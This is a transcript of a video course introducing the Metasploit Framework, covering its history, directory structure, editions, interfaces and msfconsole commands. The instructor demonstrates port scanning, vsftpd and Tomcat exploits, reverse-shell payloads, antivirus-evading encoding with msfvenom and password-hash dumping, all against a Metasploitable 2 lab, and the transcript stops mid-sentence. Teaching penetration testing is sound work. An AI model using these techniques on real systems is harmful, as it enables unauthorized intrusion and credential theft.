Because it's one of the most powerful exploit frameworks and it has a free version with wide functionality, we're going to use Metasploit throughout the course. Metasploit project is the most used penetration testing framework in the world. It can be used to test the vulnerability of computer systems or to break into remote systems. As I mentioned before, Metasploit was created by H.D. Moore in 2003 using Perl. By 2007, the Metasploit framework had been completely rewritten in Ruby. In 2009, the project was acquired by Rapid7. Now they have a free and open source version, Metasploit Framework, and a commercial version, Metasploit Pro. Its best-known subproject is the open source Metasploit Framework, a tool for developing and executing exploit code against a remote target machine. The MSF console is probably the most popular interface to the Metasploit Framework, MSF. It provides an all-in-one centralized console and allows you efficient access to virtually all of the options available in MSF. MSF console may seem intimidating at first, but once you learn the syntax of the commands, you'll learn to appreciate the power of utilizing this interface. So here we are. Meet the Metasploit framework. This is pretty much your Swiss Army knife to pen testing. Until now, you might recall the basic phases of a penetration tester and completed the lab setup. So let's talk about the big picture. Metasploit framework. I consider the MSF to be one of the most useful penetration testing tools freely available. The Metasploit framework provides an impressive workspace that is, well, beyond any others that I can think of, because it's beyond any one particular tool that has a bunch of exploits. So it's more than that, though. You can customize it for your own purpose. From a wide variety of commercial exploits, as well as an extensive exploit development environment, all the way to network information gathering tools and web vulnerability plugins. You can pretty much find almost everything that you need for a penetration test. But to be clear about this course is I have prepared this in a manner to encompass only the front end or the user aspects of the framework, pretty much with the aim to give an in-depth look into the many features of Metasploit. So this isn't an exploit development course for MSF. I'll plan that for later, and you'll be raring to go. But it is an amazing tool for sure. So before we do a little walk around, let's have a little brief talk about its history. And believe me, I'll be brief. Won't be too long. So the creator of Metasploit is H.D. Moore, who was spending most of his time validating and sanitizing public exploit codes to use in 2003. Then the idea of a framework formed in his mind, and the first edition came out. The first edition was a complete Perl project released in 2003 with a total of 11 exploits. Then, with the help of some other friends, Metasploit 2.0 was released in 2004 with 19 exploits and over 27 payloads. Then shortly after this release, the team continued to widen and Metasploit gained popularity in the information security community. Then following a complete rewrite in the Ruby programming language, the Metasploit team released Metasploit 3.0 in 2007. 150,000 lines of code added to the project in an 18-month period after migrating from Ruby. With the 3.0 release, Metasploit saw widespread adoption in the security community and also a big increase in user contributions. In the fall of 2009, Metasploit was acquired by Rapid7, which allowed HD to build a team to focus only on the development of the Metasploit framework. After the acquisition, updates have occurred more, well, rapidly. Then Rapid7 released 2 commercial products based on the Metasploit framework, Metasploit Express, and Metasploit Pro. Metasploit Express was a lighter version of the Metasploit Pro. But for this version, Rapid7 announced the end of life on June 4th, 2018. So the team will focus on Metasploit Pro by adding new features such as collaboration, group penetration testing, and oh, so much more. So I told you I'd be brief. This was your history class of the Metasploit project. So like it or not, basically the life cycle of a product pretty much defines what it is. So being familiar with the file system of a tool might help you to exploit it a little bit better. So take some time to make yourself familiar with its file system. In order to do that, the best way to learn the structure of Metasploit is to browse through its directory. Metasploit framework is provided in the User Share Metasploit Framework directory in Kali Linux, and one can more easily understand the Metasploit architecture by having a look under its hood. So let's examine the file system of Metasploit and see just how the framework is constructed. So I'm going to open a terminal and let's have a look, see where we are. So I'm going to Metasploit Framework directory. And when using Kali Linux, the Metasploit framework is usually located in the path User Share Metasploit Framework. So let's see what we have here. Right, so hopefully if you can see over my shoulder here, the MSF file system is organized by really well-defined directories. And the structure is very clear. The Metasploit framework has a variety of component categories based on their role in the penetration testing phases. For example, here, the data folder. This directory stores editable files, such as word lists and binaries, required for some of the exploits. So let me show you some of the word list directories. Metasploit uses these lists for brute force. The documentation folder. As its name suggests, the documentation directory contains the available documentation for the framework. Modules folder. All the Metasploit modules are contained in this directory. Now, the modules directory is where you will find the actual MSF modules for exploits, auxiliaries, post modules, payloads, encoders, and NLP generators, and you will be interacting with Metasploit mostly by modules. The primary directory for modules is User Share Metasploit Framework Modules, but you can use your own modules from your home directory at MSF4 Modules. Plugins folder, and as I said before, Metasploit is not a rigid tool. You can customize it and add plugins to increase its power. So you're going to find these plugins in this directory. So the common plugins are OpenVAS, Nexpose, Nessus, and a variety of others which can be loaded into the framework using the load command. Scripts. The scripts directory contains Meterpreter and other scripts. Now I'm going to show you some of the Meterpreter scripts. These scripts help you to automate some of the post-exploitation jobs, such as keyboard recording, dumping password hashes, and getting much more information from the compromised system. Tools. The tools directory has various useful command line utilities that aid in penetration testing, and that's contained in this folder. Oh, I also want to show you how to view the Metasploit directory from the GUI. Now, this will be way more helpful to get a better understanding of the framework and all of its components. So from folder view, User, Share, Metasploit framework. And now you're in the Metasploit directory. You can open the folders that you have viewed from the terminal. So you've learned so far that Metasploit is a complete penetration testing framework, and it's not just a single tool. When you call it a framework, it obviously means that it consists of many useful tools and utilities. So I've shown you basically an overview of the Metasploit file system. Metasploit consists of various components such as libraries, modules, plugins, and tools. So here I have a diagrammatic view of the structure of Metasploit for you. Let's have a look to understand the use of the various libraries as explained in the diagram. Rex handles almost all core functions such as setting up sockets, connections, formatting, and all the other raw functions. MSF Core provides the basic API, and the actual core that describes the framework, MSF Base, provides some friendly API support to the modules. So if you are not developing exploits or some of the other modules, you will mostly deal with prepared penetration modules showed here in the red rectangle in the diagram. So you have the option to load modules either at runtime or from the MSF console. To load modules at runtime, from the terminal, pass the M option when running MSF console. But you can also load your modules from MSF console by using the load path command. So here we are. Now let's have a look at this colorful diagram. It's a broad level structure of Metasploit framework. You're going to be using auxiliary modules to carry out operations such as information gathering, fingerprinting, logging into various services, and so on. These modules are particular to enumeration. For example, you might want to perform a version detection on an FTP service to model an attack. Such tasks can be very easily accomplished using auxiliary modules present in the Metasploit framework. As I created this course, there are over 1,000 auxiliary modules spread across 19 categories in the Metasploit framework. This screenshot shows various categories of the auxiliary modules present in the Metasploit framework. Now, I'm just giving you an idea of how deep it is. I don't need you to get overwhelmed by the number of auxiliary modules present in the Metasploit framework. So you don't need to know each module. You only need to know how to find the appropriate one. All you do is search the right module in the required context and use it accordingly. You're going to cover extensive usage of examples of auxiliary modules in some of the later sections of this course. But since you asked, let me quickly show you one. So I'm going to make a TCP port scan on Metasploitable 2. But first, look at the path of the auxiliary TCP port scan module. All right, so it's here, as you see in the path. So let me bring the Metasploit 2 to the record screen. It's on my second screen. Okay, so look at the IP address, 10.10.2.14. So I'm going to make a port scan on this IP. Open your terminal with me. And before I start Metasploit, it's better to start PostgreSQL. I'll talk about databases after you're familiar with the environment. So I'll initialize the Metasploit databases with msfdb init command. Then type msf console q to start Metasploit in quiet mode. Okay, so finally it's open. Now the basic syntax of usage is like this. Type use and then the name of the module that you want to use. In this case, auxiliary scanner port scan. Now here I'll press Tab. As you can see here, Metasploit has a magnificent tab completion. So now I can type the rest. And to show the variables of the module type, show options. You see the variable names make sense. Ports, R hosts. You can set a variable like this. Set R hosts 10.10.2.14. Same for ports variable. Set ports between 20 and 500. Then run the module. So it'll take a few minutes to scan for the ports between 20 and 500. And there, it's finished. So as you can see, these TCP ports are open on Metasploit 2. And this is pretty much the basic usage of an auxiliary module. So let's go ahead and meet some of the other types of modules. A payload is a piece of code that executes on the target system, and it helps us carry out some of the operations, such as connect to the command line of the target after a successful exploitation. To basically understand what a payload does, let's consider a real-world example. So I want to show you an example that I heard of before, which helps me understand it as well. Payloads are kind of an explosive material that's in the head of a missile. When the missile hits the target, the explosive material causes the damage desired by the owner. Now, the owner of the missile can change the explosive material as well as the payloads. So that's the way that the Metasploit framework works with payloads. It allows you to perform some operations on the target system. For example, a reverse shell is a payload that creates a connection from the target machine back to you as a Windows command prompt, whereas a bind shell is a payload that binds a command prompt to a listening port on the target machine, which you can then connect to. This screenshot shows various categories of payload modules present in the Metasploit framework. So I'm going to go to the Metasploit directory to view payloads. I'm using GUI to be clearer. And here, under the payload folder, you're going to see three different kinds of folders named singles, stagers, and stages. These are the main payload types. Singles are the payloads that consist of the exploit and require shellcode, which means they have everything that is required to exploit the vulnerability on the target. Naturally, the size of these payloads is pretty big. Thus, it's not going to be good for if you want to be stealthy. So, for example, this one, Meterpreter Reverse TCP. And stagers. Just so you know, sometimes size really matters. Okay, the stagers payload comes in handy in such a situation. So they don't have the exploit code. That means they're going to be smaller in size, and it's going to help you in many other tests. Like this one, bind TCP and reverse TCP. And then finally, stages. After the stagers communicate with the target system, stages are then uploaded to the target system to do the actual actions desired by the penetration tester or attacker. And here you see the Meterpreter payload, which is the most used stages payload. And you'll use it in many exploits, but we're going to get to that in some of the later sections. All right, so that's enough theory, don't you think? So open up your terminal again. And just like before, you can use an auxiliary module. Usage is the same. Use, and then the payload name. Use payload, Windows, Meterpreter, bind TCP. Now, let me tell you an important point here. Bind TCP payloads make the attacking machine directly connect to the target. So, when you show the options of this module, there will be rhost and lport variables. Rhost defines the address of the target machine. Now, in this case, it is the IP address of Metasploitable 2. And lport is the port number on the attacking machine that the attacking machine will listen on. And then on the other hand, there is reverse TCP connections. So I'll show you both ways. Use payload, Windows, Meterpreter, reverse TCP. When you show the options, you will see the lhost and lport variables. So in this case, lhost is the IP address of the callie that the target will connect back to. And lport is the port number on the callie that will listen for incoming connections from the target. So I'm going to set lhost as my IP address. Let me check my address on a new tab. Just want to be sure. Okay, 10.10.2.11 is my IP. And I'll set lport to 4445. Then you can use run or generate as the command to generate the shellcode of this payload. So this is the payload, and by scrolling down you can view just how long it is. But see, now you can use it as an exploit code. But you're not going to work that way in this course. I'll tell you why coming up. So exploits are the most important part of the Metasploit framework. They make you take advantage of a flaw within any particular system, an application, or a service. So it's by using exploits that you, or maybe an attacker, can get the results from that the developer or the system administrator would never intend for. In Metasploit framework, there are 1,824 exploits when I recorded this course, which includes more than 15 categories based on the different platforms. And right up here are the various categories of the exploits. Now I guess you might think about how you're going to find your way among all of the available exploits. So let me quickly show you one. Now, first, I got to mention you've got to be very careful before using any of these exploits. So let me suggest to you that you make an extensive enumeration on the target that you want to use an exploit on. A proper enumeration of a target might give the operating system of the target, including the exact version and architecture, open ports on the target, both TCP or UDP, services with the version information, and probability of a particular service being vulnerable. So first, let's have a look at the exploit modules from the GUI. Look into the folder, and here there are over 15 categories. And under each one, you'll find even more categories. Under Unix, FTP, here's the exploit that I want to use. So we'll go back to the terminal. Now I want to clear the screen. Usage is the same as auxiliaries. Use, and the name of the exploit. Use exploit Unix, FTP, vsftpd backdoor. So I'll use this one just as an example. Then show you the options of the exploit. Set our host to your Metasploitable2 IP address. Default port number is 21. So you don't need to change it unless you find that this version of FTP is running on another port. And I'll show you the options again. Okay, so here you go. Type exploit to run the exploit code against the Metasploitable2. And ta-da, you have your first shell on the target. As you can see here, Metasploit warns us about the open shell. So this is not an interactive shell. And while you can type some Linux commands directly here, who am I using the shell? Ooh, root user. Type ID to see the actual user. And yeah, sure enough, it's correct. So you can write here Linux commands. For example, ifconfig. And you see that? This is Metasploitable2. Now, when you create payloads directly, most of the time these payloads are detected by security tools on the targeted systems. So at this point, you will need something tricky to evade their security tools. And as you can guess, encoders come to the rescue. Now, the job of the encoders is to obfuscate your payload in such a way that it goes undetected by any of the security systems on the target system. So have a look at the table on the screen, and it shows the various encoder categories available in the Metasploit framework. So clear the screen and minimize it, and I'll show you the encoders folder from the GUI. So it's under the modules directory. You'll find the encoders folder, and that contains 10 different categories. And I will use this one under x86. So now let's turn back to the command line. To view the encoders from Metasploit, type show encoders. All the encoders will be listed just like that. Now you are allowed to encode each payload directly in Metasploit by typing set encoder and then the encoder schema name, but mostly you will use encoders with MSF Venom tool separately. So I'll do that in this tab. Open a new tab. Now, let's not get confused about MSF Venom. I'll tell you about it later in a separate section, just wanted to show you what the deal is. So now, let's just focus on the E parameter. With this parameter, you will define the encoding schema for your payload. So let me complete this example. By hitting Enter, an exe file which contains an encoded payload will be generated. And then look here, it's the root directory, and you'll see the file. And as you can see, this is a Windows executable file. Now, the post modules contain various scripts and utilities that help you to further infiltrate your target system after successful exploitation. Once you successfully exploit a vulnerability and get into your target system, the post-exploitation modules are going to help you in the following ways. Escalate user privileges, dump OS credentials, steal cookies and save passwords, get key logs from the target system, execute PowerShell scripts, and make your access persistent. The Metasploit framework has more than 250 such post-exploitation utilities and scripts. So after gaining a shell, you can choose the appropriate post module to gather more information from the target or escalate your privileges. So let's see what a post modules directory looks like. Under modules, post, and there are the post module directories. So because I have exploited a Linux system, I'll need to use Linux post-exploitation modules. So let's go have a look at the Linux folder. And under Linux, there's a gather folder. And what do you have here? The hash dump module. Now, it's not only for Linux. If you look over here, you have the same for Windows as well. Now, before we go jumping into the command line, I just want you to realize just how meaningful the Metasploit directory structure really is. Now, you might ask, can you find your way around only by examining the structure? Let's go back to terminal. So now I'm going to use the VSFTP exploit again. So use exploit Unix FTP VSFTPD, show options. Everything is ready to exploit. Then exploit J. So this command will exploit the target, and if I get a session, then it will hold that session in the background. Type sessions to list the available sessions in the background. And there it is. It's session 4. So now is the time to use a post module over this session. Now the usage syntax of a post module is the same. Type use, and then the name of the post module. Use post, Linux, gather, hash dump. Now, show the options to me. Only the session variable. So, set this variable to the index of the session 4. Then exploit. Ha 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 ha. So here are the password hashes of Metasploitable2 users. Now you don't have to stay with that. You can also use some of the other post modules. Metasploit comes in various editions. And now that there are 3 options, the Express edition isn't used any longer. The first one is a commercial edition, Metasploit Pro. So this edition offers tons of great features. It allows you to scan web applications, evade antiviruses, as well as automate exploitation. The Pro version is generally used for advanced penetration testing and included in organization security programs. So let's see what the next flavor is. Metasploit Community. So this is a free edition. It might fit for students and small businesses who want to deal with security. Now, naturally, the edition is not as capable as the Pro version is, but it can really fit into your requirements. And then the last edition is Metasploit Framework. This is the command line edition with all the manual tasks, such as manual exploitation, third-party import, and so on and so forth. And because the framework is the base for all the editions, this is the one that makes more sense for the developers and the security researchers. Now, I also want to clarify something important, that throughout this course, I will be using the Metasploit Framework edition. So except for some of the experimental purposes, I'm not going to be using the other editions. But I will show you the installation and basic usage of them so that you remain familiar. So unless I particularly specify Metasploit, you should take it to mean the Metasploit Framework from now on. And sometimes I'll say MSF, which is short for Metasploit Framework. Now this illustration can help you to understand the differences between the editions. And of course, Metasploit Pro has some additional features. So it is indeed obvious to me, and certainly I hope to you, that Metasploit Pro is addressed more by security professionals and the security consulting practices. Now, unlike the others, the Pro version has an increased execution and browsing functionality. So besides what open source framework offers, Metasploit Pro goes above and beyond by delivering a full graphical user interface, automated exploitation capabilities, and complete user action audit logs, as well as customizable reporting. The Pro features an advanced penetration testing workflow that includes antivirus evasion, customized reporting, social engineering capabilities, web application support, VPN pivoting, and multi-user capabilities. Metasploit Pro can also be installed on Windows, Linux, and Mac OS X machines, and you can certainly run it on almost any web browser. Or you can continue to use the command line interface, which they call Pro Console. Metasploit Pro is fully supported by Rapid7's security and support specialists, in addition to the large and, well, it's been growing, the Metasploit community. So to use Metasploit Pro, you will need to purchase it from Rapid7 and install it on your system. However, they have cleverly developed a trial version, so you can go ahead and download it and examine what the Pro version offers in detail. The Metasploit community is a lighter version of the Metasploit Pro. Now, like the Pro edition, you will have a graphical user interface over the web browser, and that will incredibly help you to simplify your efforts, such as network discovery and vulnerability verification for specific exploits. You can increase the effectiveness of your vulnerability scanners, such as Nessus, Nexpose, and so forth, by using them with the community version. The Metasploit community offers some great features. Map your network. That supports you to scan and make host identification. Provide a concurrent export-import capability that helps you to work with tools such as Nessus, Nmap, and others. In addition, Nexpose scans can be initiated from within the Metasploit Community Edition, and a bunch of other wonderful features you're going to see. So the only thing you should be watching here is enumeration and safe exploitation. Oh, and another thing that I forgot to say. I think it's the best part. It's free. Still. So let's have a look at the interface. Now, although there is a whole section about community, I only want to show you the interface for now. If you don't want to install it by yourself, you don't have to do it now. It's in its own section. So have a look at the interface. And it displays over the web browser. So I'm just going to open my browser. I happen to have it bookmarked here. And this is the login screen for the Community Edition. Going to enter my login info. And click Sign In. And this is the main view. Now I'm going to zoom in and hide this panel to get a better view. Yeah, that's a little better. So as you can see, the projects reside here. You can list or create a new project from this menu. And over here on the upper right-hand corner, you will see the global settings and community user account information. All right, so now let's view the details of Pen Test 1. So this is the overview, the summary of the project. However, on the above menu, you can also see some special items to work with Metasploit community. For example, you can manage hosts, your sessions, and your credentials. Some menu items like web apps are only in the Pro version. So that means you're going to see this annoying page. Metasploit also offers various types of user interfaces, and each one has its own advantages. The GUI interface. With the graphical user interface, some people say GUI. I tend to prefer GUI. Almost everything might be done by clicking a button. This interface is user-friendly, and that helps to provide a cleaner scanning and exploiting environment. I've showed you that while talking about the Pro and the Community editions. You might like it a whole lot better because it just, is a clean way to exploit a target. Now this is the console interface. The way I see it, most of the penetration testers and security researchers use this interface. It's also the most popular one. Its power cannot be underestimated. This interface provides an all-in-one approach to basically all the options offered by Metasploit. It's also considered one of the most stable interfaces. Now, throughout the range of this course, I'm going to be using this console interface for the most part. Now, once you get used to the environment and the commands, you're going to consider yourself a console ninja. And the next one is the command line interface. Metasploit had an interface named MSF CLI, but nowadays it doesn't really exist. You can use MSF Console's X parameter to accomplish the exact same thing now. It supports almost every feature that Metasploit framework has, such as the launching of exploits to activities, payload generation, and so forth. However, I think it's hard to memorize every command each time, so I tend not to use it too much, although somehow I'll use it a couple of times. You'll see when we get there. So for those of you who want to benefit from MSF, but you really feel you need a GUI, hold on. The next one is for you. Armitage. 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 You say Armitage. Anyway, Armitage by Raphael Mudge. It's a cool hacker-style GUI interface. It provides a lot of the features such as easy vulnerability management, Nmap scans, exploit recommendations. It uses Cortana scripting language for automation. Now, to be honest, I don't really use this feature, and so I will give you some extra thoughts about Armitage in the next slide. Also, there's a full section that covers how to use it efficiently, so stay tuned. I first want to show you the equivalent of the old MSF CLI interface. Because it doesn't exist now, MSF Console's X parameter does the exact task for you. So open your terminal. MSF Console H will display a basic help menu. Now here the parameter and its description is visible. But now I'm going to use it as type MSF Console X. Then, between double quotes, write your Metasploit commands. So I'm going to use the VSFTPD exploit again. And yeah, there's no tab completion here. So that's why I was saying earlier, it might be a little more difficult to remember the command each time. So anyway, hit enter, and it'll start the Metasploit at the very first moment. Then it will use the exploit and set its variables. A session is open in the background, so I will interact with that session by sessions I1. Now, because this is not a Meterpreter shell, you can directly write Linux commands to the screen. You name A to check the machine's full name, ifconfig, and this is what you saw earlier in Metasploitable 2. Now, due to some licensing issues, Offensive Security doesn't ship Metasploit Community and the Trial Pro versions in Kali Linux. That's why I want to provide you with another free option, which is called Armitage. Now, it's not an addition of the Metasploit framework. It's an interface that will help you manage your penetration tests. It has a very good Java-based graphical user interface. And as I said before, hey, it's developed by Raphael Mudge. So the goal here is to help security professionals better understand hacking and help them realize the power of Metasploit. So now let's let's have a look at how to get into this tool. You don't need to install Armitage into Kali. It already comes pre-installed. So naturally, you can install Armitage to some other Linux distros, but for Windows, it's not valid. So you can't work with Armitage on Windows systems. Now, you may find a way to use it on Windows, but it probably won't be worth the effort. Anyway, open your terminal and type Armitage, and it asks for connecting to the database server, so click Connect. Then it'll ask to start Metasploit RPC server to remotely interact with Metasploit, so click Yes. And at first glance, this is what it looks like. Now, you see that on the left pane, the modules are there. And on the right pane, there is nothing, but if you have your hosts, it will be listed. And below is for the console and the module-specific tabs. So you can manage Armitage from the above menu. And here inside the Armitage menu item, you can set global settings for Armitage and create listeners, change the view of the right pane. The console item provides you with a place to manage your credentials, your jobs, downloaded files, and all that. And you'll see that they come up as tabs below. Under the host item, there are options for managing hosts on your penetration test. Armitage allows you to add host and make an Nmap scan on them at any time during a pen test. Another great feature of Armitage is here under the attacks menu. It will suggest exploits for your target host after a rather extensive enumeration. So if you want to, you can try every suitable exploit onto the target host. On the workspace menu, you can create and change between your workspaces. So that is Armitage in general. We're going to get into much greater detail in an entire section of its own just a little bit later. So now you have the basic information about the Metasploit framework and its structure. So why don't we go ahead and let's get started with the basics of MSF console. And I guess you could consider it the most popular interface. But before I show you a demo, I want to tell you a little bit more about it. It is just a simple command line interface for the Metasploit framework. However, don't let its simplicity fool you. It's an easy and flexible way to interact with the framework. It's the most stable and powerful interface to access most of the features within MSF. Now, at first, the syntax might be a bit confusing. It's not going to take you much time to appreciate the power of this interface. Now, you will use MSF console to rule the Metasploit framework throughout the rest of this course. As I mentioned to you earlier, some of the Metasploit editions offer GUI and web-based interfaces. However, I think from a learning perspective, I'm always going to recommend mastering the command line console of the Metasploit framework. And among my favorite things is the Linux command style tabbing, as well as the command completion. That's my friend, and I'm sure it'll become your friend too. So go ahead and open your terminal and simply type in MSF console H to display the basic help for the console. So this is basic help menu for MSF console. Now, certainly you're familiar with the Q and the X parameter from some of the previous videos. For the other ones, I'm going to let you go ahead and discover them by yourself, because you're not going to really need them throughout the rest of this course. So, to interact with the console, just type MSF console. So I add the Q parameter to start the Metasploit in a quiet way. And you'll get the point after a few minutes. Watch. So type it and hit enter. Now, if this is the first time you start it up, you may need to wait a little longer, but not too much. And look at that. That's all there is. MSF Console is all that. So to find your way and take advantage of using Metasploit, MSF Console provides some commands, and you can type help to view the commands. So they're categorized by their usage purpose. Here are some of the core commands. The core commands work all the time. They are not specific to a particular module or something else. And then the module commands, these ones are related to the modules such as exploit, payloads, and those are the ones that we've used in previous videos. Job commands help you manage handlers, your incoming connections. Resource commands are very useful when you want to automate your work. Now, because Metasploit was developed with Ruby, it also provides you a Ruby shell to interact with. And then all the developer commands help you to specialize your Metasploit experience. Now, Metasploit has the ability to use a database, such as MySQL, PostgreSQL. So with database commands, you're going to manage the database operations. For example, you can import a scan result into Metasploit, or you can export the results. And there's so many more options. Now, while you are conducting a penetration test, you'll probably get some credentials. So that's usernames, passwords, hashes, etc. With creds, you can view, add, or delete these credentials. Of course, you can if you use Metasploit. And now I want to dive into MSF Console commands in the next section, so come with me. So MSF has such a wide variety of different commands, and they all have well-defined name conventions that will help you to rule the framework. So let's have a look. Core commands. These are the basic commands of Metasploit. You can use them to make general purpose as well as framework-level tasks. Module commands. They're there to help you move between modules and to pass values to the variables. You can view and use a module with these commands. Job commands are basically used for interacting with your sessions to view the status of the jobs that you've started. Resource script commands allow you to record and to run your own scripts to automate your routines. Developer commands allow you to edit the files and interact with Ruby. Database commands are, like we were talking about before, importing and exporting as well as the connection to a database. With these commands, that's where you're going to save your findings. And the credential commands are used when you activate database, and they help you to store and get credentials found while you're doing your penetration testing. So I chose some sets so that you get the basic idea about how to use them. So why don't we go ahead and jump into Kali to see them in action. Go ahead and open your terminal and just write MSF Console. So this time, you see that I don't put the Q as a parameter because, well, I don't want to view that banner. Banners are these funny things here. You can change them every time by typing the banner command. But believe me, that's not the actual fun part. You're going to find the real fun in later modules, but I want to make sure that you're well-versed in the basics. So I'll choose to divide the MSF Console commands into groups to show you in a more meaningful way and make it clear. So, okay, let's start. Color command will provide a colorful output if you enable it. Now, by default, it is enabled. and you may disable it for whatever reason you like. I'm going to enable it by putting in color true. Now to view the MSF version, just type the version command. All right, so this is my installation version when I was recording the course. And then beside MSF console commands, the interface allows you to execute Linux system commands. Now, I don't know if it's the same in Windows, but on Linux, you have this flexibility. I can change my directory, view it, or I can check my IP address. But anyway, I think you get the point. So you still have questions about the commands? All right, so type this into the console, and it will help you. Or just put help, and you'll see the same output. Now let's say this is not enough, and you want some specific info about a particular command. Type help, and then the command name. So for example, help workspace. Or maybe help help. There's only so much it can do. Okay, so type help search. And then let's have a look at the search command help output. So this command will really be helpful to find a module. And you're going to use it many times. It's okay. You just stick in a search term and you'll see the result. And as you can see from the help screen, you can also be more specific while you're searching. So let's type in search name Java. Now, that, as you see, will bring up many Java-related modules to the screen. Let's search name Java, rank excellent, date 2011. Okay, so only 3 results. So obviously you can narrow the result by being more specific. Okay, so the next thing is grepping. You can grep the output of this command like this. Metasploit also records your history like bash, so it has a history file. And with the history command, you can view what you have entered in the MSF console, just like that. Here you can see some of my previous commands. But you can also save all the output, not only to history. So look at the spool command. We'll type spool and then the output file name, and then it will save everything. Spool desktop msf.log. So now whatever you see in MSF console will be saved to that file. So let's cat this file. And there it is, it saves everything. Here you might want to type spool stop, but I'm not going to do that now. In a penetration test, you may also configure the Metasploit according to your needs. And you are allowed to save your configuration by simply typing the save command, and then your configuration will be saved to that file. Now here, because I'm not making any change to the default settings, you won't see anything. If you finish your work with Metasploit, you can then quit by using quit or the exit command. You can close up Metasploit and exit just like that. So now open your terminal and start the MSF console. The first command of this part is show. Now when you work with a module, it helps you to display the variables and properties of that module. So the help screen is for showing us that. Type the show command, and then the name of the object. So let's have a look at NOP generators by typing show NOPs. And as you see, the NOP generators list appears. So there's no plug-in for this phase. And here are the encoders. And also the exploits. but it might take a little while to list all the exploits if you try to list them. And then here are all the exploits in Metasploit. Now, when you need to use an exploit, you can search these exploits. For example, if you want to exploit a Java RMI server code execution, you can search for terms like RMI, RMI registry. So yeah, let's perform a search just like that. Search RMI registry. And you see it brings me the appropriate exploit. So I want to make an important point here. When you are conducting a pen test, you should perform an extensive enumeration on the target to choose the right exploit. That's how you know what to search for. Although Metasploit has many exploits, it doesn't mean that you can use every single one in every circumstance. First, you'll need to find the vulnerability, and then if Metasploit has a suitable exploit, you can use that. Otherwise, you may have a headache if you randomly run exploits, and it's a waste of time. Okay, so back to the RMI registry exploit. So now you have the name of the exploit. And if you recall from the previous videos, how do you use this exploit? Type use and then the name of the exploit. Now you can work with that exploit. If you want to be sure about the exploit, or if you want to configure the details, you can use the info command to get detailed information about what the exploit's going to do. And in this case, this is an exploit, but for sure it can be any other Metasploit module. So read the description, examine the variables, or follow the reference link to get additional information about that particular exploit. Show the options to view the variables, and these are the basic variables. And yes, you can set some advanced variables to have more control over the exploit code. How do you do that? Show advanced. So, here are the other variables of the exploit to make some of the advanced configurations. Some exploits only work with a specific operating system or software versions, whatever. Now, to send the target the right exploit code, you've got to know the version of what you're trying to exploit. Makes sense, right? I'll assume here that you have made enumeration and you know your target well. So that's what you tell Metasploit. Here you specify the available targets by the show targets command. As I hope you see on the screen, there's only 5 types of targets. So this means that this exploit can't be utilized on environments other than these particular 5. For the most part. In a production environment, your exploit may fail due to IPS, IDS, or firewall rules. So I think it's good practice to evade these security measures. For each exploit, there are different evasion techniques in Metasploit. So let's use the show evasion command to display the available techniques. And if you want, you can choose these. And these are the payloads that I listed by the show payloads command. Now, like evasion, for each exploit, there are different payloads. So this means you can't use a Linux payload for a Windows system. And for this exploit, there are these available payloads. Now I'll show you these variables again, and let's set them. You may remember from some of the previous videos how to set a variable, so we'll do that now. Use the set command, just like that. That's why I like the Linux console. Setting the value of variable means you can get the value of the same variable by simply typing get as the command and then the variable name. This is the Metasploitable 2 IP address in my lab environment. Now you can also unset a variable value by using the unset command. And I just unset our host value, as you see here. So you may come across a situation that you need to use the same value in every exploit. So you can just set the variable to the same value in each exploit again. If you use setG command, you can globally set a variable value, and by using the getG command, you can get the global value of a variable. And then simply you can unset a global variable by using the unsetG command. Now, after setting all the variables, you can get the exploit to execute by either using the run or the exploit commands. It actually doesn't matter. So these messages here show what's going on in the background. And you will also be informed by Metasploit if a session is open. So now I have the session, and by typing the sessions command, I will list my available sessions. And as expected, I have only this one. Now to interact with that session, type sessions as your command with the I parameter, and then an index of the session appears. In my case, it's 3. Okay, so now I'm in the Meterpreter shell. Later, you're going to have your deep dive into Meterpreter, I promise. But for now, I'm going to only show you that I have exploited the Metasploitable 2. Then let's type in background to turn back to the MSF console again. Now when you're finished with an exploit, you can pick another one directly by using the use command like this, or you can use the back and then utilize the new one by the use command. That's pretty much how I work. Then show the exploit options. Now for this exploit, I will define a payload by setting the payload variable, set payload Java Meterpreter reverse TCP. So I don't set the rhost variable, but in the previous video, I defined it as a global variable. And also there are some new variables under this payload section, lhost and lport, because I chose a reverse TCP connection, which means that after a successful exploitation, the target will connect back to me. So lhost in this context is the IP address of Kali, and lport is the port that is ready to connect to Kali. Its default value is 4444, and I don't want to change that. I will only set the lhost to 10.10.2.11, then set HTTP password to Tomcat, set HTTP username to Tomcat. Now it isn't necessary, but I can set the target to 0. I forgot the R port. So let's set the R port to 8180. Okay, so let me check it one more time. Okay, yeah, everything looks good. Now, exploit. See, it doesn't take too much time. And I have the Meterpreter session on Metasploitable 2. But this time, let's have a look at the user Tomcat55. It is not the root user. So this means actually you don't have a high privileged shell. So I'm going to send this session to the background by using the Meterpreter bg command. So this is my sessions list in the background. Okay, so I want to show you a couple more commands. Push M and pop M. Push M will push the current module to stack. Now I will push this exploit to stack. Then I can pick another one, RMI registry exploit, and I'll run it, and I get another session. So as you can see here, I am working with RMI registry exploit. With the pop M, I'll pop the last module from the stack, and it's the Tomcat Manager exploit as you see here on your screen. So I'll advise you to do this because when you're doing some really quick exploitation, those last two commands come in super handy. All right, so I want to get something off my chest I need to share with you. As a penetration tester, it's really important to be organized while testing. Now, you're probably going to find yourself in an information pool, and I don't want you to drown. It contains tons of details like credentials, vulnerable services, targets, scan reports, and the list goes on and on. So it is absolutely essential to keep track of what you've done on the network. So this is why MSF has an option to cover with extensive support multiple database systems. So configuring a database to work with MSF will be a real time saver for you. MSF supports MySQL and PostgreSQL. You can use both. However, PostgreSQL is the default one, which has built-in support within MSF. And by using this feature, you can easily access scan information, export and import results, use the identified information later on in modules. Then you will also be able to keep your findings clean and well organized. So go ahead and open your terminal again. Metasploit can use databases to store information. So you have the option to start without a database. But please, for a better penetration testing experience, I do not recommend this. So before starting the MSF console using a database, you need to run a sequence of commands. The default installation of Metasploit framework on Kali uses PostgreSQL. So you should first start PostgreSQL from the Linux terminal by typing in systemctl start postgresql.service. And now the next thing is creating and initializing the Metasploit database in PostgreSQL. For this, you can use the msfdb command, and here's the help screen for it. So let's check the database status by typing in msfdb status. And what comes up is PostgreSQL is running, and msfdb finds a database connection file in the default directory. So if you start msfdb, it will use the information in this file for connecting to PostgreSQL. So I'm going to go ahead and delete that database, and let's create it from the beginning. msfdb delete for deletion. Okay, so now initialization with msfdb init. Then start the msfdb with msfdb start. Now actually when you run msfdb, it will automatically start PostgreSQL. Therefore, you can only use msfdb, but this is just my habit. So I'll first run PostgreSQL, then msfdb. And I'm going to run it in quiet mode. Okay, MSF console opened. Now, in order to do the database operations, MSF console has its own database commands. So let's 